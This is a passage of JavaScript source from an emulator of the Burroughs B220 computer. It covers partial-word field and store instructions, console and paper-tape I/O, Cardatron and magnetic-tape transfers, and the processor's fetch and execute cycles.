(loadB) { // set B register if op=DLB this.B.set(this.B.value); } this.CCONTROL = ((s%10)*0x10 + L)*0x100 + this.CCONTROL%0x100; this.C.set((this.CCONTROL*0x100 + this.COP)*0x10000 + this.CADDR); if (L > 0) { // check whether L was decremented to zero this.setProgramCheck(1); } else { this.writeMemory(); } } }; /**************************************/ B220Processor.prototype.branchField = function branchField(regValue) { /* Implements BFA/BFR (36, 37). Compares digits of a designated partial field in the A or R register word to a rotating two-digit value in (42) of the C register */ var adder = 0; // current adder digit var carry = 1; // carry flag defaults to 1, since we're subtracting var dd; // current pattern digit var dw; // rotating 2-digit pattern value var equal = 1; // start out assuming equality var L; // partial-word length var rd; // current register digit var rw = regValue; // register value var s; // partial-word "s" digit this.opTime = 0.075; this.SUT.set(1); dw = this.CCONTROL%0x100; // 2-digit pattern to compare s = this.CCONTROL >>> 12; if (s == 0) { s = 10; } L = (this.CCONTROL >>> 8)%0x10; if (L == 0) { L = 10; } // Now position the word and compare digits to the rotating pattern. 
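        // (Illustrative sketch: with a two-digit pattern of 12, successive field
        // digits are compared against 2, 1, 2, 1, ... as the pattern rotates.)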
this.DC.set(0x09); // set up to rotate 11 digits while (this.DC.value < 0x20) { rd = rw%0x10; // get digit from register value if (s < 10) { // positition to the "s" digit ++s; // just ignore any initial digits } else if (L > 0) { // operate on the partial-word field --L; dd = dw%0x10; // get digit from increase value this.X.set(rd); // for display only this.Y.set(dd); adder = 9 - rd + dd + carry; if (adder < 10) { // decimal correct the adder carry = 0; } else { carry = 1; adder -= 10; } this.Z.set(adder); // for display only dw = (dw-dd)/0x10 + dd*0x10;// rotate the 2-digit pattern if (adder) { equal = 0; // if the adder is not zero, fields are unequal } } else { // just ignore any remaining digits after L is exhausted } rw = (rw-rd)/0x10; // shift register word right (no need to rotate it) this.DC.inc(); } // while DC < 20 this.C10.set(carry); // set carry toggle, for display only if (equal) { // if equality exists, branch this.opTime += 0.020; this.P.set(this.CADDR); } this.CCONTROL = ((s%10)*0x10 + L)*0x100 + this.CCONTROL%0x100; this.C.set((this.CCONTROL*0x100 + this.COP)*0x10000 + this.CADDR); if (L > 0) { // check whether L was decremented to zero this.setProgramCheck(1); } }; /**************************************/ B220Processor.prototype.storeRegister = function storeRegister() { /* Implements STA/STR/STB (40). Stores a whole word or a designated partial field in a memory word based on the sL (22) digits of the C register */ var adder; // current adder digit var dd; // current memory (D-register) digit var dw; // memory (D-register) word var L; // partial-word length var rd; // current increase digit var rw; // increase value var s; // partial-word "s" digit var xd; // current D-register digit var xw = 0; // word used to construct the D-register value this.opTime = 0.100; this.E.set(this.CADDR); this.readMemory(); if (!this.MET.value) { switch (this.CCONTROL%0x10) { case 1: // STR: Store R rw = this.R.value; break; case 2: // STB: Store B rw = this.B.value; break; default: // STA: Store A rw = this.A.value; break; } // switch if ((this.CCONTROL & 0x10) == 0) { // whole-word store this.D.set(rw); this.IB.set(rw); s = L = 0; } else { // partial-word store this.D.set(0); dw = this.IB.value; s = this.CCONTROL >>> 12; if (s == 0) { s = 10; } L = (this.CCONTROL >>> 8)%0x10; if (L == 0) { L = 10; } // Now position the field and copy the digits this.DC.set(0x09); // set up to rotate 11 digits while (this.DC.value < 0x20) { rd = rw%0x10; // get digit from register value dd = dw%0x10; // get digit from memory value if (s < 10) { // positition to the "s" digit ++s; adder = dd; // just copy the memory digit xd = 0; } else if (L > 0) { // operate on the partial-word field --L; adder = rd; // copy digit from register into memory value xd = rd; } else { adder = dd; // just copy any remaining memory digits after L is exhausted xd = 0; } dw = (dw-dd)/0x10 + adder*0x10000000000; // rotate result digit into memory value rw = (rw-rd)/0x10; // shift register value right (no need to rotate it) xw = xw/0x10 + xd*0x10000000000; // copy zero or register digit into D-register this.DC.inc(); } // while DC < 20 this.D.set(xw); this.IB.set(dw); } this.CCONTROL = ((s%10)*0x10 + L)*0x100 + this.CCONTROL%0x100; this.C.set((this.CCONTROL*0x100 + this.COP)*0x10000 + this.CADDR); if (L > 0) { // check whether L was decremented to zero this.setProgramCheck(1); } else { this.writeMemory(); } } }; /*********************************************************************** * Console I/O Module * 
***********************************************************************/ /**************************************/ B220Processor.prototype.keyboardAction = function keyboardAction(d) { /* Receives a single digit from the Console keyboard. Non-negative values of d indicate decimal digit keys and are shifted into the low-order digit of D. Negative values of d indicate function keys: -1 = ADD key pressed -2 = C key pressed -3 = E key pressed -4 = EXAM key pressed -5 = ENT key pressed -6 = STEP key pressed */ var word = this.D.value; if (!this.RUT.value) { // make sure we're not running switch (d) { case 0: case 1: case 2: case 3: case 4: case 5: case 6: case 7: case 8: case 9: this.D.set((this.D.value%0x10000000000)*0x10 + d); break; case -1: // ADD key pressed this.keyboardAdd(); break; case -2: // C key pressed, do D -> C this.fetchWordToC(word); break; case -3: // E key pressed, do D -> E this.E.set(word%0x10000); this.D.set(0); break; case -4: // EXAM key pressed, memory -> D this.readMemory(); if (!this.MET.value) { // invalid address this.E.inc(); this.D.set(this.IB.value); } break; case -5: // ENT key pressed, D -> memory this.IB.set(word); this.writeMemory(); if (!this.MET.value) { this.E.inc(); } break; case -6: // STEP key pressed this.step(); break; } // switch d } }; /**************************************/ B220Processor.prototype.keyboardAdd = function keyboardAdd() { /* Algebraically add the addend (D) to the augend (A), returning the result in A. Similar to integerAdd(), except (a) the processor must not be running, (b) there is no reference to memory, (c) the addend comes from D instead of IB, (d) subtract is not possible, although the numbers may be signed, and (e) the processor is returned to running status after the add completes. No timing is accumulated because the processor has been stopped */ var am = this.A.value % 0x10000000000; // augend mantissa var aSign = ((this.A.value - am)/0x10000000000)%2; var compl; // complement addition required var dm = this.D.value % 0x10000000000; // addend mantissa var dSign = ((this.D.value - dm)/0x10000000000)%2; var sign = dSign; // local copy of sign toggle if (!this.RUT.value) { // we must be stopped this.SUT.set(0); compl = (aSign^sign); am = this.bcdAdd(am, dm, 11, compl, compl); // Now examine the resulting sign (still in the adder) to see if we // have overflow or need to recomplement the result. 
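        // (In effect: Z=0 means the sum is already in true form, Z=1 means a carry
        // out of the sign position, i.e. overflow, and Z=9 means the sum is in
        // complement form and must be recomplemented.)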
switch (this.Z.value) { case 0: am += sign*0x10000000000; break; case 1: am += (sign-1)*0x10000000000; this.OFT.set(1); break; default: // sign is 9 // reverse the sign toggle and recomplement the result (virtually adding to the zeroed dm) sign = 1-sign; am = this.bcdAdd(am, 0, 11, 1, 1); // after recomplementing, set the correct sign (adder still contains sign of result) am += (sign - this.Z.value)*0x10000000000; break; } // switch this.Z.value if (am%0x10000000000 == 0) { am = aSign*0x10000000000; } // Set toggles for display purposes and return the result this.DST.set(dSign); this.SGT.set(sign); this.A.set(am); this.start(); } }; /**************************************/ B220Processor.prototype.consoleOutputSign = function consoleOutputSign(printSign) { /* Outputs the sign character for a SPO (09) command and sets up to output the first number digit */ var d; var w; this.asyncOff(); if (this.AST.value) { // if false, we've probably been cleared d = this.bcdAdd(this.CCONTROL, 0x990, 3); // decrement word count this.CCONTROL += d - this.CCONTROL%0x1000; this.C.set((this.CCONTROL*0x100 + this.COP)*0x10000 + this.CADDR); this.E.set(this.CADDR); this.readMemory(); if (this.MET.value) { // invalid address this.ioComplete(true); } else { this.D.set(this.IB.value); this.execClock += 0.070; // estimate for memory access and rotation w = this.D.value%0x10000000000; d = (this.D.value - w)/0x10000000000; // get the sign digit this.D.set(w*0x10 + d); // rotate D+sign left one this.DC.set(0x10); // set up for 10 more digits this.DPT.set(this.CCONTROL%0x10 == 1 && this.COP == 0x09); this.LT1.set(this.LEADINGZEROESSW); // use LT1 for leading-zero suppression (probably not accurate) this.EWT.set(0); this.PZT.set(d == 2 && !this.HOLDPZTZEROSW); this.PA.set(0x80 + d); // translate numerically this.asyncOn(); printSign(this.PA.value, this.boundConsoleOutputChar); } } }; /**************************************/ B220Processor.prototype.consoleOutputChar = function consoleOutputChar(printChar) { /* Outputs the next character code for a SPO (09) command and sets up to output the next number digit. 
If the Shift Counter is already at 20, terminates the output operation and sends a Finish signal */ var d; var w; this.asyncOff(); if (this.AST.value) { // if false, we've probably been cleared if (this.EWT.value) { if (this.CCONTROL%0x1000 < 0x10) { this.asyncOn(); printChar(0x35, this.boundConsoleOutputFinished); } else { this.C.inc(); this.CADDR = this.C.value%0x10000; this.asyncOn(); printChar(0x35, this.boundConsoleOutputSign); } } else if (this.PZT.value) { // Output alphabetically w = this.D.value % 0x1000000000; d = (this.D.value - w)/0x1000000000; // get next 2 digits this.D.set(w*0x100 + d); // rotate D+sign left by two this.execClock += 0.060; // estimate for rotation this.DC.inc(); // increment DC for two digits this.DC.inc(); this.PA.set(d); if (this.DC.value >= 0x20) { this.EWT.set(1); } this.asyncOn(); printChar(d, this.boundConsoleOutputChar); } else { // Output numerically if (this.DPT.value && !this.LEADINGZEROESSW) { // decimal point may be needed d = this.CCONTROL >>> 12; if (this.DC.value + d > 0x19) { this.DPT.set(0); this.LT1.set(0); // stop any zero-suppression this.PA.set(0x03); // decimal point code this.asyncOn(); printChar(0x03, this.boundConsoleOutputChar); return; // early exit } } do { // suppress leading zeroes if necessary w = this.D.value % 0x10000000000; d = (this.D.value - w)/0x10000000000; // get a digit this.D.value = w*0x10 + d; // rotate D+sign left by one this.execClock += 0.065; // estimate for rotation this.DC.inc(); } while (d == 0 && this.LT1.value && this.DC.value < 0x20); this.LT1.set(0); this.D.set(this.D.value); d += 0x80; // translate numerically this.PA.set(d); if (this.DC.value >= 0x20) { this.EWT.set(1); } this.asyncOn(); printChar(d, this.boundConsoleOutputChar); } } }; /**************************************/ B220Processor.prototype.consoleOutputFinished = function consoleOutputFinished() { /* Handles the final cycle of console output */ this.asyncOff(); if (this.AST.value) { // if false, we've probably been cleared this.EWT.set(0); this.ioComplete(true); } }; /**************************************/ B220Processor.prototype.consoleInputFinishWord = function consoleInputFinishWord(result) { /* Finishes the receipt of a word from the Console paper tape reader and either stores it in memory or shunts it to the C register for execution. Updates the C register as necessary and decides whether to initiate receipt of another word. 
Note that this routine does not do asyncOff -- that is handled by the caller */ var d; var w; if (this.sDigit) { // decrement word count d = this.bcdAdd(this.CCONTROL, 0x990, 3); this.CCONTROL += d - this.CCONTROL%0x1000; this.C.set((this.CCONTROL*0x100 + this.COP)*0x10000 + this.CADDR); } if (this.COP != 0x05) { // read normal: sign digit in normal position w = this.D.value%0x10000000000; d = (this.D.value - w)/0x10000000000; } else { // read inverse: permute the sign digit d = this.D.value%0x10; w = (this.D.value - d)/0x10; this.D.set(w + d*0x10000000000); if (d == 2) { // alphanumeric translation is invalid for inverse mode this.setPaperTapeCheck(1); this.ioComplete(true); return; // >>> ALARM ERROR EXIT <<< } } if (this.rDigit & d & 0x08) { // B-modify word before storing this.D.set(w + (d&0x07)*0x10000000000); this.IB.set(this.D.value - w%0x10000 + this.bcdAdd(w, this.B.value, 4)); this.C10.set(0); } else { // store word as-is this.IB.set(this.D.value); } if (this.rDigit == 1 && (d & 0x0E) == 0x06) { // control word to C register this.ioComplete(false); // terminate I/O but do not restart Processor yet this.fetch(true); // set up to execute control word // Schedule the Processor to give the reader a chance to finish its operation. setCallback(this.mnemonic, this, 0, this.schedule); } else { // just store the word this.writeMemory(); if (this.MET.value) { // memory address error this.ioComplete(true); } else if (this.sDigit && this.CCONTROL%0x1000 < 0x10) { // word count exhausted this.ioComplete(true); } else { // initiate input of another word this.D.set(0); this.asyncOn(); if (this.COP == 0x05) { d = this.console.inputUnitSelect(this.selectedUnit, this.boundConsoleInputInitiateInverse); } else { d = this.console.inputUnitSelect(this.selectedUnit, this.boundConsoleInputInitiateNormal); } if (d < 0) { // no unit available -- set alarm and quit this.setPaperTapeCheck(1); this.ioComplete(true); } } } }; /**************************************/ B220Processor.prototype.consoleInputInitiateNormal = function consoleInputInitiateNormal(result) { /* Initiates the receipt into a word of characters from the Console tape reader in normal (sign-first) mode. 
Increments the C register operand address, rotates the sign digit into the D register, and determines whether the word should be translated numerically or alphanumerically */ var code = result.code; this.asyncOff(); if (this.AST.value) { // if false, we've probably been cleared this.E.set(this.CADDR); this.C.inc(); this.CADDR = this.C.value%0x10000; switch (code) { case 0x17: // invalid character/parity error this.setPaperTapeCheck(1); this.ioComplete(true); break; case 0x35: // end-of-word this.consoleInputFinishWord(result); break; case 0x82: // sign=2, set alpha translation this.PZT.set(!this.HOLDPZTZEROSW); this.D.set(2); this.asyncOn(); result.readChar(this.boundConsoleInputReceiveChar); break; default: // anything else, set numeric translation this.PZT.set(0); if ((code & 0xF0) == 0x80) {// it's a numeric sign -- okay this.D.set(code%0x10); this.asyncOn(); result.readChar(this.boundConsoleInputReceiveChar); } else if (code == 0) { // we'll take a space as a zero this.D.set(0); this.asyncOn(); result.readChar(this.boundConsoleInputReceiveChar); } else { // sign is non-numeric -- invalid this.D.set(0); this.setPaperTapeCheck(1); this.ioComplete(true); } break; } // switch code } }; /**************************************/ B220Processor.prototype.consoleInputInitiateInverse = function consoleInputInitiateInverse(result) { /* Initiates the receipt into a word of characters from the Console tape reader in inverse (sign-last) mode. Increments the C register operand address, rotates the sign digit into the D register, and sets PZT for numeric translation */ var code = result.code; this.asyncOff(); if (this.AST.value) { // if false, we've probably been cleared this.E.set(this.CADDR); this.C.inc(); this.CADDR = this.C.value%0x10000; switch (code) { case 0x17: // invalid character/parity error this.setPaperTapeCheck(1); this.ioComplete(true); break; case 0x35: // end-of-word this.consoleInputFinishWord(result); break; default: // anything else, set numeric translation this.PZT.set(0); if ((code & 0xF0) == 0x80) {// it's a numeric code -- okay this.D.set(code%0x10); this.asyncOn(); result.readChar(this.boundConsoleInputReceiveChar); } else if (code == 0) { // we'll take a space as a zero this.D.set(0); this.asyncOn(); result.readChar(this.boundConsoleInputReceiveChar); } else { // digit is non-numeric -- invalid this.D.set(0); this.setPaperTapeCheck(1); this.ioComplete(true); } break; } // switch code } }; /**************************************/ B220Processor.prototype.consoleInputReceiveChar = function consoleInputReceiveChar(result) { /* Handles an input character coming from the Console paper-tape reader. result.code is the B220 character code read from the device. result.readChar is the callback function to request the next character. 
Data digits are rotated into the D register; end-of-word (0x35) codes are handled according to the sign digit in the D register */ var code = result.code; // character received var sign; // register sign digit var word; // register word less sign this.asyncOff(); if (this.AST.value) { // if false, we've probably been cleared switch (code) { case 0x17: // invalid character/parity error this.setPaperTapeCheck(1); this.ioComplete(true); break; case 0x35: // end-of-word this.consoleInputFinishWord(result); break; default: // anything else, accumulate digits in word if (this.PZT.value) { // alphanumeric translation this.D.set((this.D.value % 0x1000000000)*0x100 + code); this.asyncOn(); result.readChar(this.boundConsoleInputReceiveChar); } else { // numeric translation if ((code & 0xF0) == 0x80) {// it's a numeric code -- okay this.D.set((this.D.value % 0x10000000000)*0x10 + code%0x10); this.asyncOn(); result.readChar(this.boundConsoleInputReceiveChar); } else if (code == 0) { // we'll take a space as a zero this.D.set((this.D.value % 0x10000000000)*0x10); this.asyncOn(); result.readChar(this.boundConsoleInputReceiveChar); } else { // code is non-numeric -- invalid this.setPaperTapeCheck(1); this.ioComplete(true); } } break; } // switch code } }; /*********************************************************************** * Cardatron I/O Module * ***********************************************************************/ /**************************************/ B220Processor.prototype.cardatronOutputWord = function cardatronOutputWord() { /* Initiates a read of the next word from memory for output to the Cardatron Control Unit. Returns a negative number to stop transfer */ var word; this.asyncOff(); if (!this.AST.value) { // we've probably been cleared word = -1; } else if (this.MET.value) { // previous memory access error word = 0; } else { word = this.readMemory(); // address in E was previously set if (this.MET.value) { word = 0; } else { this.E.dec(); // step down to next memory address } this.execClock += 0.117; // time for full-word transfer } this.asyncOn(); return word; }; /**************************************/ B220Processor.prototype.cardatronOutputFinished = function cardatronOutputFinished() { /* Handles the final cycle of an I/O operation and restores this.execTime */ if (this.AST.value) { // if false, we've probably been cleared this.ioComplete(true); } }; /**************************************/ B220Processor.prototype.cardatronReceiveWord = function cardatronReceiveWord(word) { /* Handles a word coming from the Cardatron input unit. Negative values for the word indicates this is the last word and the I/O is finished. Otherwise, the word is stored into the D register and is handled according to the sign digit in the D register. The last word received (typically a "pusher" word of zeroes) is abandoned and not acted upon. 
Returns -1 if further data transfer is to be terminated, 0 otherwise */ var returnCode = 0; // default is to continue receiving var sign; // D-register sign digit this.asyncOff(); if (!this.AST.value) { // we've probably been cleared returnCode = -1; } else if (word < 0) { // Last word received -- finished with the I/O this.D.set(word-0x900000000000);// remove the finished signal; for display only, not stored this.ioComplete(true); returnCode = -1; } else if (this.MET.value) { // Memory error has occurred: just ignore further data from Cardatron this.asyncOn(); } else { // Full word accumulated -- process it and initialize for the next word this.D.set(word); word %= 0x10000000000; // strip the sign digit sign = (this.D.value - word)/0x10000000000; // get D-sign switch (sign) { case 0: // sign is 0-5: store word normally case 1: case 2: case 3: case 4: case 5: this.IB.set(this.D.value); this.writeMemory(); if (!this.MET.value) { this.E.dec(); // decrement memory address for next word } this.asyncOn(); break; case 6: // sign is 6, 7: execute control word case 7: if (this.vDigit & 0x01) { // input control words are inhibited this.IB.set(this.D.value); this.writeMemory(); // just store the word with its sign if (!this.MET.value) { this.E.dec(); // decrement memory address for next word } this.asyncOn(); } else { // input control words are executed this.IB.set(this.D.value); // move word to IB for use by fetch() this.ioComplete(false); // terminate I/O but do not restart Processor yet this.fetch(true); // set up to execute control word returnCode = -1; // stop further input from Cardatron // Schedule the Processor to give Cardatron a chance to finish its operation. setCallback(this.mnemonic, this, 0, this.schedule); } break; default: // sign is 8, 9: store word with optional B mod if (!(this.rDigit & 0x08)) { // no B-register modification this.IB.set(this.D.value); } else { // add B to low-order four digits of word word = word - word%0x10000 + this.bcdAdd(word, this.B.value, 4); this.C10.set(0); // reset carry toggle this.IB.set((sign%2)*0x10000000000 + word); } this.writeMemory(); if (!this.MET.value) { this.E.dec(); // decrement memory address for next word } this.asyncOn(); break; } // switch sign this.execClock += 0.117; // time for full-word transfer } return returnCode; }; /*********************************************************************** * Magnetic Tape I/O Module * ***********************************************************************/ /**************************************/ B220Processor.prototype.magTapeComplete = function magTapeComplete(control, word) { /* Call-back routine to signal completion of a magnetic tape operation. If this.AST is false, does nothing, as we have probably either been cleared or the Reset/Transfer switch has been activated. Otherwise, if "control" is true, the contents of "word" are processed as a tape control word and an appropriate branch is set up. Unconditionally terminates the tape I/O instruction. 
asyncOff() will be done by ioComplete() */ var aaaa = 0; // address where C & P will be stored var bbbb = 0; // address to load into P if (this.AST.value) { // if false, we've probably been cleared if (control) { this.D.set(word); bbbb = word%0x10000; aaaa = ((word - bbbb)/0x10000)%0x10000; if (word%0x20000000000 >= 0x10000000000) { // if sign bit is 1, bbbb = this.bcdAdd(bbbb, this.B.value, 4); // B-adjust the low-order 4 digits } this.E.set(aaaa); this.readMemory(); if (!this.MET.value) { this.IB.set(this.IB.value - this.IB.value%0x100000000 + (this.C.value%0x10000)*0x10000 + this.P.value%0x10000); this.writeMemory(); this.P.set(bbbb); } } Promise.resolve(true).then(this.boundIoComplete); } }; /**************************************/ B220Processor.prototype.magTapeSendWord = function magTapeSendWord(initialFetch) { /* Sends the next of data from memory to the tape control unit, starting at the current operand address in the C register. "initialFetch" is true if this call is the first to fetch words for a block. This causes the routine to save the current operand address in the control digits of C. Returns binary -1 if the processor has been cleared or a memory address error occurs, and the I/O must be aborted. Returns the BCD memory word otherwise */ var result; // return value this.asyncOff(); if (!this.AST.value) { result = -1; // we've probably been cleared } else { if (initialFetch) { this.CCONTROL = this.CADDR; // copy C address into control digits } this.E.set(this.CADDR); this.CADDR = this.bcdAdd(this.CADDR, 1, 4); this.C.set((this.CCONTROL*0x100 + this.COP)*0x10000 + this.CADDR); this.readMemory(); if (this.MET.value) { // invalid address result = -1; } else { result = this.IB.value; this.D.set(result); } } this.asyncOn(); return result; }; /**************************************/ B220Processor.prototype.magTapeReceiveWord = function magTapeReceiveWord(initialStore, word) { /* Stores the next of data from the tape control unit to memory, starting at the current operand address in the C register. "initialStore" is true if this call is the first to store words for a block. This causes the routine to save the current operand address in the control digits of C. Returns binary -1 if the processor has been cleared or a memory address error occurs, and the I/O must be aborted. 
Returns 0 otherwise */ var result = 0; // return value var sign; // sign digit this.asyncOff(); if (!this.AST.value) { result = -1; // we've probably been cleared } else { if (initialStore) { this.CCONTROL = this.CADDR; // copy C address into control digits } this.E.set(this.CADDR); this.CADDR = this.bcdAdd(this.CADDR, 1, 4); this.C.set((this.CCONTROL*0x100 + this.COP)*0x10000 + this.CADDR); this.D.set(word); if (this.vDigit & 0x08) { // B-adjustment of words is enabled sign = (word - word%0x10000000000)/0x10000000000; if (sign & 0x08) { // this word is to be B-adjusted word = (sign&0x07)*0x10000000000 + word%0x10000000000 - word%0x10000 + this.bcdAdd(word, this.B.value, 4); this.C10.set(0); // reset carry toggle } } this.IB.set(word); this.writeMemory(); if (this.MET.value) { // invalid address result = -1; } } this.asyncOn(); return result; }; /*********************************************************************** * Fetch Module * ***********************************************************************/ /**************************************/ B220Processor.prototype.fetchWordToC = function fetchWordToC(word) { /* Transfers "word" to the C register, applying B-register modification if necessary */ var dSign = ((word - word%0x10000000000)/0x10000000000)%2; this.DST.set(dSign); this.CADDR = word%0x10000; // C address this.COP = (word%0x1000000 - this.CADDR)/0x10000; // C op code this.CCONTROL = (word%0x10000000000 - word%0x1000000)/0x1000000;// C control digits if (!dSign) { this.C.set(word%0x10000000000); } else { this.CADDR = this.bcdAdd(this.CADDR, this.B.value, 4); this.C10.set(0); // reset carry toggle this.C.set((this.CCONTROL*0x100 + this.COP)*0x10000 + this.CADDR); } }; /**************************************/ B220Processor.prototype.fetch = function fetch(entryP) { /* Implements the Fetch cycle of the 220 processor. This is initiated either by pressing START on the Console with EXT=0 (Fetch), pressing STEP on the Console when the computer is stopped and EXT=0, during I/O when a control word (sign 6,7) is received from a peripheral device, or by the prior Operation Complete if the processor is in continuous mode. The "entryP" parameter indicates whether the instruction word is already in IB (true) or must be fetched from the address in P first (false) */ var dSign; // sign bit of IB register var word; // instruction word if (entryP) { // if instruction already loaded word = this.IB.value; } else { // if doing normal fetch this.E.set(this.P.value); word = this.readMemory(); } if (!this.MET.value) { // (should set IB sign bit 1=0 here, but to reduce overhead we don't bother) this.fetchWordToC(word); this.D.set(word); // D contains a copy of memory word if (!entryP && !this.PCOUNTSW) { this.P.inc(); // if not doing I/O, bump the program counter } } // if we're not locked in Fetch, switch to Execute cycle next. if (!this.FETCHEXECUTELOCKSW) { this.EXT.set(1); } this.execClock += 0.090; // fetch uniformly requires 90 us }; /*********************************************************************** * Execute Module * ***********************************************************************/ /**************************************/ B220Processor.prototype.execute = function execute() { /* Implements the Execute cycle of the 220 processor. 
This is initiated either by pressing START on the console with the EXT=1 (Execute), or by the prior Operation Complete if the processor is in automatic mode */ var d; // scratch digit var w; // scratch word var x; // scratch variable or counter w = this.C.value; this.CCONTROL = (w - w%0x1000000)/0x1000000; // C register control digits this.COP = (w%0x1000000 - w%0x10000)/0x10000; // C register operation code this.CADDR = w%0x10000; // C register operand address this.opTime = 0; // clear the current instruction timer ++this.instructionCount; if (this.OFT.value && this.HCT.value && this.COP != 0x31) { this.setStop(); // if overflow and SOH and instruction is not BOF, stop return; // do not go through Operation Complete } this.E.set(0); this.IB.set(0); switch (this.COP) { case 0x00: //--------------------- HLT Halt this.setStop(); this.opTime = 0.010; this.operationComplete(); break; case 0x01: //--------------------- NOP No operation this.opTime = 0.010; this.operationComplete(); break; case 0x03: //--------------------- PRD Paper tape read this.opTime = 0.185; // just a guess... d = this.CCONTROL >>> 12; // get unit number if (d == 0) { d = 10; // xlate unit 0 to unit 10 } this.selectedUnit = d; this.rDigit = this.CCONTROL%0x10; this.sDigit = 1; // use word count in C (32) this.D.set(0); this.ioInitiate(); d = this.console.inputUnitSelect(this.selectedUnit, this.boundConsoleInputInitiateNormal); if (d < 0) { // no unit available -- set alarm and quit this.setPaperTapeCheck(1); this.ioComplete(true); } break; case 0x04: //--------------------- PRB Paper tape read, branch this.opTime = 0.185; // just a guess... d = this.CCONTROL >>> 12; // get unit number if (d == 0) { d = 10; // xlate unit 0 to unit 10 } this.selectedUnit = d; this.rDigit = (this.CCONTROL & 0x0E) | 1; // force recognition of control words this.sDigit = 0; // do not use word count in C (32) this.D.set(0); this.ioInitiate(); d = this.console.inputUnitSelect(this.selectedUnit, this.boundConsoleInputInitiateNormal); if (d < 0) { // no unit available -- set alarm and quit this.setPaperTapeCheck(1); this.ioComplete(true); } break; case 0x05: //--------------------- PRI Paper tape read, inverse format this.opTime = 0.185; // just a guess... d = this.CCONTROL >>> 12; // get unit number if (d == 0) { d = 10; // xlate unit 0 to unit 10 } this.selectedUnit = d; this.rDigit = (this.CCONTROL & 0x0E) | 1; // force recognition of control words this.sDigit = 1; // use word count in C (32) this.D.set(0); this.ioInitiate(); d = this.console.inputUnitSelect(this.selectedUnit, this.boundConsoleInputInitiateInverse); if (d < 0) { // no unit available -- set alarm and quit this.setPaperTapeCheck(1); this.ioComplete(true); } break; case 0x06: //--------------------- PWR Paper tape write this.opTime = 0.185; // just a guess... 
d = this.CCONTROL >>> 12; // get unit number if (d == 0) { d = 10; // xlate unit 0 to unit 10 } this.selectedUnit = d; this.ioInitiate(); d = this.console.outputUnitSelect(d, this.boundConsoleOutputSign); if (d < 0) { // no unit available -- set alarm and quit this.setPaperTapeCheck(1); this.ioComplete(true); } break; case 0x07: //--------------------- PWI Paper tape write interrogate, branch d = this.CCONTROL >>> 12; // get unit number if (d == 0) { d = 10; // xlate unit 0 to unit 10 } this.selectedUnit = d; d = this.console.outputUnitSelect(d, B220Processor.emptyFunction); if (d < 0) { // if not ready, continue in sequence this.opTime = 0.015; } else { // if ready, branch to operand address this.P.set(this.CADDR); this.opTime = 0.035; } this.operationComplete(); break; case 0x08: //--------------------- KAD Keyboard add this.opTime = 0.005; this.D.set(0); this.setStop(); this.operationComplete(); break; case 0x09: //--------------------- SPO Supervisory print-out this.opTime = 0.185; // just a guess... this.ioInitiate(); d = this.console.outputUnitSelect(0, this.boundConsoleOutputSign); if (d < 0) { // no unit available -- set alarm and quit this.setPaperTapeCheck(1); this.ioComplete(true); } break; case 0x10: //--------------------- CAD/CAA Clear add/add absolute this.SUT.set(0); this.clearAdd(this.CCONTROL % 0x10 == 1); this.operationComplete(); break; case 0x11: //--------------------- CSU/CSA Clear subtract/subtract absolute this.SUT.set(1); this.clearAdd(this.CCONTROL % 0x10 == 1); this.operationComplete(); break; case 0x12: //--------------------- ADD/ADA Add/add absolute this.SUT.set(0); this.integerAdd(this.CCONTROL % 0x10 == 1, false); this.operationComplete(); break; case 0x13: //--------------------- SUB/SUA Subtract/subtract absolute this.SUT.set(1); this.integerAdd(this.CCONTROL % 0x10 == 1, false); this.operationComplete(); break; case 0x14: //--------------------- MUL Multiply this.integerMultiply(); this.operationComplete(); break; case 0x15: //--------------------- DIV Divide this.integerDivide(); this.operationComplete(); break; case 0x16: //--------------------- RND Round this.opTime = 0.015; // minimum instruction timing this.SUT.set(0); w = this.A.value%0x10000000000; this.SGT.set(((this.A.value - w)/0x10000000000)%2); if (this.R.value%0x10000000000 >= 0x5000000000) { // Add round-off (as the carry bit) to absolute value of A. 
this.A.value -= w; // preserve the A sign digit w = this.bcdAdd(w, 0, 11, 0, 1); if (w >= 0x10000000000) { this.OFT.set(1); // overflow occurred w -= 0x10000000000; // remove the overflow bit from A } this.A.set(this.A.value + w); // restore the A sign digit this.opTime += 0.060; // account for add cycle } this.R.set(0); // unconditionally clear R this.operationComplete(); break; case 0x17: //--------------------- EXT Extract this.integerExtract(); this.operationComplete(); break; case 0x18: //--------------------- CFA/CFR Compare field A/R this.compareField(); this.operationComplete(); break; case 0x19: //--------------------- ADL Add to location this.SUT.set(0); this.integerAdd(false, true); // result to D register this.IB.set(this.D.value); this.writeMemory(); // E still contains the operand address this.opTime += 0.70; // additional time over standard ADD this.operationComplete(); break; case 0x20: //--------------------- IBB Increase B, branch w = this.B.value; this.B.add(this.CCONTROL); if (this.B.value < w) { this.opTime = 0.040; } else { this.P.set(this.CADDR); this.opTime = 0.060; } this.operationComplete(); break; case 0x21: //--------------------- DBB Decrease B, branch w = this.B.value; this.B.sub(this.CCONTROL); if (this.B.value > w) { this.opTime = 0.040; } else { this.P.set(this.CADDR); this.opTime = 0.060; } this.operationComplete(); break; case 0x22: //--------------------- FAD/FAA Floating add/add absolute this.SUT.set(0); this.floatingAdd(this.CCONTROL % 0x10 == 1); this.operationComplete(); break; case 0x23: //--------------------- FSU/FSA Floating subtract/subtract absolute this.SUT.set(1); this.floatingAdd(this.CCONTROL % 0x10 == 1); this.operationComplete(); break; case 0x24: //--------------------- FMU Floating multiply this.floatingMultiply(); this.operationComplete(); break; case 0x25: //--------------------- FDV Floating divide this.floatingDivide(0); this.operationComplete(); break; case 0x26: //--------------------- IFL Increase field location this.increaseFieldLocation(); this.operationComplete(); break; case 0x27: //--------------------- DFL Decrease field location this.decreaseFieldLocation(false); this.operationComplete(); break; case 0x28: //--------------------- DLB Decrease field location, load B this.decreaseFieldLocation(true); this.operationComplete(); break; case 0x29: //--------------------- RTF Record transfer this.opTime = 0.040; do { d = this.bcdAdd(this.CCONTROL, 0x990, 3); // decrement word count this.CCONTROL += d - this.CCONTROL%0x1000; this.E.set(this.CADDR); this.CADDR = this.bcdAdd(this.CADDR, 1, 4); // increment source address this.C.set((this.CCONTROL*0x100 + this.COP)*0x10000 + this.CADDR); this.readMemory(); if (this.MET.value) { // invalid address break; // out of do loop } else { this.E.set(this.B.value); this.B.inc(); // increment destination address this.opTime += 0.060; this.writeMemory(); if (this.MET.value) { break; // out of do loop } } } while (this.CCONTROL%0x1000 > 0x00F); this.operationComplete(); break; case 0x30: //--------------------- BUN Branch, unconditionally this.opTime = 0.035; this.P.set(this.CADDR); this.operationComplete(); break; case 0x31: //--------------------- BOF Branch, overflow this.opTime = 0.015; if 